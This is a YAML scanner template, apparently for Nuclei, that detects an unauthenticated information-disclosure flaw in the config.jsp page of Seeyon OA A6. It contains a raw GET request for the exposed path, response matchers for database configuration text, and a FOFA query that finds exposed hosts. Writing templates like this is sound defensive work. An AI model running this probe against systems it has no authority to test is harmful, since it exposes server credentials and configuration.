36 lines
1.3 KiB
YAML
36 lines
1.3 KiB
YAML
|
id: seeyon-config-exposure
|
||
|
|
||
|
info:
|
||
|
name: Seeyon OA A6 config.jsp - Information Disclosure
|
||
|
author: SleepingBag945
|
||
|
severity: medium
|
||
|
description: |
|
||
|
The Seeyon OA A6 config.jsp page can be accessed without authorization, resulting in sensitive information leakage vulnerabilities, through which attackers can obtain sensitive information in the server
|
||
|
reference:
|
||
|
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20A6%20config.jsp%20%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md
|
||
|
- https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java
|
||
|
metadata:
|
||
|
max-request: 1
|
||
|
fofa-query: body="yyoa" && app="致远互联-OA"
|
||
|
verified: true
|
||
|
tags: seeyon,oa,config,info-leak
|
||
|
|
||
|
http:
|
||
|
- raw:
|
||
|
- |
|
||
|
GET /yyoa/ext/trafaxserver/SystemManage/config.jsp HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
Content-Type: application/x-www-form-urlencoded
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
words:
|
||
|
- "DatabaseName="
|
||
|
- "请在文本框内配置传真插件所需服务器的信息"
|
||
|
condition: and
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|